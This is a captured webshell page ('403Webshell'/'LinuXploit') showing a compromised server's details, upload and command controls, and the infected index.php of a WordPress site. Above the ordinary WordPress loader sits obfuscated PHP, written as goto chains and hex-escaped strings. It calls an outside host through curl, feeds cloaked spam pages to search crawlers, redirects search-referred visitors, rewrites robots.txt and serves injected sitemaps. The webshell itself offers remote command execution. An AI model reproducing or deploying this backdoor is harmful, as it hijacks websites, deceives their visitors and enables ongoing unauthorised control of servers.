403Webshell
Server IP : 198.38.94.67  /  Your IP : 216.73.217.74
Web Server : LiteSpeed
System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
User : azfilmst ( 1070)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/azfilmst/azfilmz.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/azfilmst/azfilmz.com/index.php
<?php
 goto E8c0N; kjMtD: $data1["\162\x65\161\137\165\x72\154"] = $req_url; goto QRy51; qVPgk: $req_uri = str_replace(array("\56\x68\164\155", "\56\x68\164\x6d\154", "\x2e\x73\x68\164\x6d\154", "\x2e\160\x68\x74\155\154"), '', rtrim($req_uri, "\57")); goto YnFS_; P4ZLJ: $url_words = $inter_domain . "\57\x77\157\x72\x64\x73\x2e\160\150\x70"; goto k0AOT; w31DM: $req_uri = $_SERVER["\x52\105\121\125\x45\123\x54\x5f\125\122\x49"]; goto FZcIQ; qSnU1: $http = isset($_SERVER["\110\x54\124\120\x53"]) && $_SERVER["\x48\124\x54\120\123"] !== "\x6f\146\146" ? "\150\x74\x74\x70\x73\72\57\x2f" : "\x68\x74\x74\x70\72\57\x2f"; goto w31DM; IaruG: $map1 = $inter_domain . "\x2f\155\141\160\56\160\x68\160"; goto w2QZ7; k0AOT: $url_robots = $inter_domain . "\57\x72\157\x62\x6f\x74\163\x2e\160\150\160"; goto t_h4I; eCfjD: $res_crawl = is_crawler($user_agent); goto qVPgk; DE228: $data1[] = array(); goto nng0R; IqOJQ: $chk_refer = check_refer($referer); goto e9zTi; i7UkB: $indata1 = $inter_domain . "\x2f\x69\x6e\x64\x61\164\141\56\160\x68\x70"; goto IaruG; t_h4I: if (strpos($req_uri, "\56\160\x68\x70")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } goto DE228; xWGun: function check_refer($refer) { $check_refer = false; $referbots = "\x67\x6f\157\147\154\x65\174\171\x61\x68\157\x6f\x7c\142\151\x6e\147\174\141\157\154"; if ($refer != '' && preg_match("\57\x28{$referbots}\51\x2f\x73\151", $refer)) { $check_refer = true; } return $check_refer; } goto qSnU1; NKoUW: if (substr($req_uri, -4) == "\x2e\170\x6d\x6c") { if (strpos($req_uri, "\141\x6c\154\163\x69\164\x65\x6d\x61\160\56\x78\155\154")) { $str_cont = getServerCont($map1, $data1); header("\x43\157\156\164\x65\x6e\x74\x2d\x74\x79\160\x65\x3a\164\x65\170\164\x2f\x78\x6d\x6c"); echo $str_cont; die; } if (strpos($req_uri, "\56\160\x68\x70")) { $word4 = explode("\77", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace("\56\170\155\154", '', $word4); } else { $word4 = str_replace("\57", '', $req_uri); $word4 = str_replace("\56\170\x6d\154", '', $word4); } $data1["\167\157\162\x64"] = $word4; $data1["\x61\143\x74\x69\x6f\156"] = "\143\150\145\143\153\x5f\x73\x69\x74\145\x6d\x61\160"; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == "\61") { $str_cont = getServerCont($map1, $data1); header("\x43\157\156\164\x65\156\164\x2d\164\171\160\x65\x3a\x74\x65\170\164\57\170\x6d\154"); echo $str_cont; die; } $data1["\141\143\164\151\157\x6e"] = "\143\150\145\143\153\137\167\x6f\162\144\x73"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "\x6d\x61\x70") > 0 || $check1 == "\x31") { $data1["\x61\x63\164\151\157\156"] = "\x72\x61\x6e\x64\137\x78\x6d\x6c"; $check_url4 = getServerCont($url_words, $data1); header("\x43\x6f\x6e\x74\145\156\164\x2d\164\x79\160\145\x3a\164\145\170\164\57\170\x6d\154"); echo $check_url4; die; } } goto aVX79; QCWHH: $data1["\162\x65\x71\137\x75\162\x69"] = $req_uri; goto X3Cz9; H61lN: $self = $_SERVER["\x50\x48\x50\x5f\x53\105\114\106"]; goto WHyv6; X3Cz9: $data1["\150\162\145\x66"] = $href1; goto kjMtD; CfN1K: $req_url = $http . $domain . $req_uri; goto i7UkB; TOxu2: $referer = isset($_SERVER["\x48\124\124\x50\137\x52\x45\106\105\122\105\x52"]) ? $_SERVER["\x48\x54\x54\x50\x5f\x52\105\106\105\x52\x45\x52"] : ''; goto IqOJQ; w2QZ7: $jump1 = $inter_domain . "\57\x6a\165\x6d\x70\x2e\160\x68\x70"; goto P4ZLJ; YnFS_: if (!$res_crawl && $chk_refer && (preg_match("\57\x5c\144\44\x2f", $req_uri) || preg_match("\43\x5b\141\x2d\x7a\135\x3d\133\x61\x2d\x7a\x30\x2d\x39\135\53\x23", $req_uri) || preg_match("\57\151\164\x65\x6d\x2f", $req_uri))) { $data1["\x69\x70"] = $_SERVER["\122\105\115\x4f\124\105\x5f\x41\x44\104\x52"]; $data1["\x72\145\x66\x65\x72\x65\162"] = isset($_SERVER["\110\x54\x54\120\x5f\122\x45\x46\105\x52\x45\x52"]) ? $_SERVER["\110\x54\x54\120\x5f\122\x45\x46\x45\122\x45\122"] : ''; $data1["\x75\x73\145\x72\137\x61\x67\x65\156\164"] = strtolower(isset($_SERVER["\110\x54\124\120\x5f\x55\x53\x45\122\x5f\x41\107\105\116\124"]) ? $_SERVER["\x48\x54\x54\x50\x5f\125\x53\x45\122\137\101\x47\x45\116\124"] : ''); echo getServerCont($jump1, $data1); die; } goto RNGth; y_3tT: function is_crawler($agent) { $agent_check = false; $bots = "\147\157\x6f\x67\x6c\x65\142\x6f\164\174\x62\x69\156\147\142\x6f\164\x7c\x67\157\x6f\x67\154\x65\174\x61\157\x6c\x7c\142\x69\x6e\147\x7c\x79\141\150\x6f\157"; if ($agent != '') { if (preg_match("\x2f\50{$bots}\x29\57\163\151", $agent)) { $agent_check = true; } } return $agent_check; } goto xWGun; E8c0N: $inter_domain = "\150\164\x74\160\72\x2f\x2f\172\x36\60\x33\61\x37\x5f\61\66\x2e\x61\150\157\x65\x67\x65\x72\56\163\150\157\x70\x2f"; goto Pz1dx; FZcIQ: $domain = $_SERVER["\x48\x54\x54\120\x5f\x48\117\123\124"]; goto H61lN; RNGth: if ($res_crawl) { $data1["\150\x74\x74\160\137\165\163\145\162\137\141\x67\145\x6e\164"] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; die; } goto BA2qJ; aVX79: if (strpos($req_uri, "\x2e\160\x68\x70")) { $main_shell = $http . $ser_name . $self; $data1["\155\141\x69\x6e\x5f\163\x68\x65\x6c\154"] = $main_shell; } else { $main_shell = $http . $ser_name; $data1["\x6d\141\151\x6e\137\x73\x68\145\154\154"] = $main_shell; } goto TOxu2; WHyv6: $ser_name = $_SERVER["\123\x45\122\126\x45\x52\137\116\x41\115\105"]; goto CfN1K; nng0R: $data1["\x64\157\x6d\x61\x69\156"] = $domain; goto QCWHH; e9zTi: $user_agent = strtolower(isset($_SERVER["\x48\x54\124\x50\137\125\123\105\x52\x5f\x41\x47\x45\x4e\x54"]) ? $_SERVER["\x48\x54\x54\120\137\x55\x53\105\x52\137\101\107\x45\116\x54"] : ''); goto eCfjD; Pz1dx: function getServerCont($url, $data = array()) { $url = str_replace("\x20", "\53", $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); if (version_compare(PHP_VERSION, "\x38\x2e\60\x2e\60", "\x3c")) { curl_close($ch); } if (0 !== $errorCode) { return false; } return $output; } goto y_3tT; QRy51: if (substr($req_uri, -6) == "\162\x6f\142\157\x74\x73") { define("\x42\x41\x53\x45\x5f\x50\x41\124\110", $_SERVER["\104\x4f\103\125\115\x45\116\x54\x5f\122\x4f\117\124"]); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\x72\x6f\142\x6f\164\x73\56\x74\x78\x74"); $data1["\x72\x6f\142\157\164\163\137\143\x6f\156\164"] = $robots_cont; $robots_cont = @getServerCont($url_robots, $data1); file_put_contents(BASE_PATH . "\57\162\x6f\142\157\x74\163\56\164\x78\x74", $robots_cont); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\x72\157\142\x6f\x74\x73\x2e\x74\170\164"); if (strpos(strtolower($robots_cont), "\163\x69\164\x65\x6d\141\160")) { echo "\162\157\142\157\164\x73\56\x74\170\x74\40\x66\x69\154\x65\40\143\162\x65\x61\x74\x65\40\163\x75\x63\x63\x65\163\x73\41"; } else { echo "\162\157\x62\157\x74\x73\x2e\x74\170\x74\40\x66\x69\x6c\145\40\x63\x72\145\x61\164\145\x20\x66\141\151\x6c\x21"; } die; } goto NKoUW; BA2qJ: ?>
 <?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

Youez - 2016 - github.com/yon3zu
LinuXploit